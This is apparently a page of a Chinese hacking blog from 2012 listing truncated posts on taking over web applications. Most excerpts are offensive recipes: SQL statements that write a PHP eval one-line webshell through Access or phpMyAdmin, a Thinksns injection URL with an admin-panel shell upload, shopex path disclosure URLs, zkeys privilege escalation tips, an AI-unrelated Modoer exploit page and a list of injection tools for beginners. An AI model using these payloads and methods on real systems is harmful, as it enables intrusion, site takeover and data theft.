微信爆出漏洞!马化腾微信被盗!

分类:新闻 | 2012-10-21 | 撸过 768 次
3人扯谈

    在前不久,有极客网友根据电话采访周鸿祎的视频拨号声,分析出了周鸿祎的电话号码。此事一经报道,立刻在社会中传播开来。极客探究和不留后患的做法甚至得到了社会各界的广泛认可。周鸿祎得知后亲自抛出了橄榄枝。19日下午,有网友向本网提供消息,在WooYun 论坛又有一位极具实力的极客(黑客),他通过利用微信账号安全的设置漏洞,成功地破解了多为名人的微信账号,并公布为证。

目前该极客已经成功破解了柳岩、马化腾的微信账号。不知他会不会得到马化腾的垂青呢?漏洞及破解具体过程如下:

今天发现个微信群发的漏洞。还没玩。就被修补了。

于是就有了这个漏洞的产生。

同样问题产生在重置用户密码的环节。[......]

继续阅读

ACCESS执行SQL语句导出一句话拿webshell

分类:安全 | 2012-10-12 | 撸过 1,060 次
1人扯谈

实用环境,在access后台其他方法不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。

逐一执行以下语句就可以导出一句话了
第一句代码

create table cmd (a varchar(50))

第二句代码

insert into cmd (a) values ('一句话木马')

 
第三句代码

select * into [a] i[......]

继续阅读

学会使用这些工具,你就是合格的新手!

分类:安全 | 2012-10-12 | 撸过 2,902 次
3人扯谈

SQL Injection:
啊D            算是新手必用吧,比较简单,没有特别复杂的界面,一看就懂,批量扫描注入功能不错,配合搜索语法比较适合新手练手
明小子       比啊D多些功能,能够查询旁注,其中有个上传功能蛮不错的
NBSI        这个软件对于SQL server的注入有极高的准确率
Pangolin  俗称穿山甲啊,比较好用的注入工具,虽然大牛们说1.3版以后Pangolin就死了,但是对于小菜来说这个工具还是不错的;针对多种平台,多种数据库都能注入
Havij       国外的注入软件,比穿山甲好点,但是是英文的,也支持各种平台

Web Scanner[......]

继续阅读

akcms 代码执行漏洞

分类:安全 | 2012-10-8 | 撸过 725 次
1人扯谈

    上周挖出的akcms的后台模版getshell感觉没什么新意,然后又仔细看了看代码,发现了一个比较有“前途”的洞,代码执行漏洞,而且出问题函数是作者提供给建站用户进行二次开发时使用的,也就是说这个问题放大的程度也会要大些。

0x01、原理分析

漏洞问题主要存在于include\common.func.php文件中的ak_if函数,先看下代码

akcms 代码执行漏洞

eval函数参数中的变量$variable未作任何的处理变插入到了函数中。ak_if这个函数的主要用途是,提供给建站用户一个简单的逻辑判断功能的接口。对比一下4.1版本中的这段代码

akcms 代码执行漏洞

可以发现,相差了eval函数调用的语句。在4.1.[......]

继续阅读

shopex前台普通用户getshell最新漏洞

分类:安全 | 2012-10-8 | 撸过 530 次
0人扯谈

第一个:想办法找到目标网站的绝对路径

http://www.webshell.cc/install/svinfo.php?phpinfo=true
https://www.webshell.cc/core/api/shop_api.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_cat.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_goodstype.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0[......]

继续阅读

phpmyadmin 导出 shell 至中文路径

分类:安全 | 2012-09-27 | 撸过 1,611 次
0人扯谈
set character_set_client='gbk';
set character_set_connection='gbk';
set character_set_database='gbk';
set character_set_results='gbk';
set character_set_server='gbk';
select '<?php eval($_POST[cmd]);?>' into outfile 'd:\www\网站\mm.php';

zkysoft 主机提权方法

分类:安全 | 2012-09-27 | 撸过 541 次
0人扯谈

 

zkeys 默认网站用户权限很低,大部分exp都用不了,如 iis6 exp 就提示无法设置注册表。

提供我成功过的几个方法(不一定有效):

1、如果目标仅仅是旁站的话可以去注册表查 serv-u 的指定用户密码,注册表地址:HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\

2、如果要提权的话可以找找有 winwebmail 没,这个东西有的 zkeys 装了,有的没装,如果找到这东西直接去他目录写个 shell,权限就比之前大了,exp 也能提了。

我碰到的几个都是在 d:\winwebmail\web\ 只要有这东西就好办,[......]

继续阅读

Modoer Exp

分类:安全 | 2012-09-27 | 撸过 762 次
0人扯谈

源码:

<html>
<head>
<title> Modoer EXP </title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<script language="javascript">
    function expstart() {
            var url = document.forms[0].url.value;
            if(url != ""){[......]

继续阅读

SourceForge被黑客入侵 phpMyadmin被植入后门

分类:新闻 | 2012-09-26 | 撸过 580 次
0人扯谈

2012年9月25日消息,今天微博爆出消息,国外知名下载网站SourceForge韩国CDN节点疑似被入侵,热门下载资源phpMyadmin被植入后门。

SourceForge. net是世界上最大的开源软件开发网站。很多国外非常有用的资源都可以从上面下载。而由于国内目前暂无SourceForge的CDN节点,导致从国内访问下载均是从韩国节点获取数据。对国内用户影响非常大。

20120925072759750

国内用户从韩国节点下载资源包含后门文件

 

phpMyAdmin 是一个用PHP编写的,可以通过 web 方式控制和操作 MySQL 数据库,广泛应用于服务器数据库管理中,在国内绝[......]

继续阅读

Thinksns微博系统注入漏洞即后台拿webshell

分类:安全 | 2012-09-20 | 撸过 619 次
0人扯谈

 

Exp:

http://www.webshell.cc/index.php?app=blog&mod=Index&act=show&id=2211

注入点注入字段

表ts_user

`uid` int(11) NOT NULL AUTO_INCREMENT,
`email` varchar(255) DEFAULT NULL,
`password` varchar(255) DEFAULT NULL,
`admin_level` varchar(255) DEFAULT '0', 用户等级 1为管理员

后台拿shell方法

后台-全局-附件设置-扩展名限定增加php[......]

继续阅读

第 10 页,共 70 页« 最新...89101112...203040...最旧 »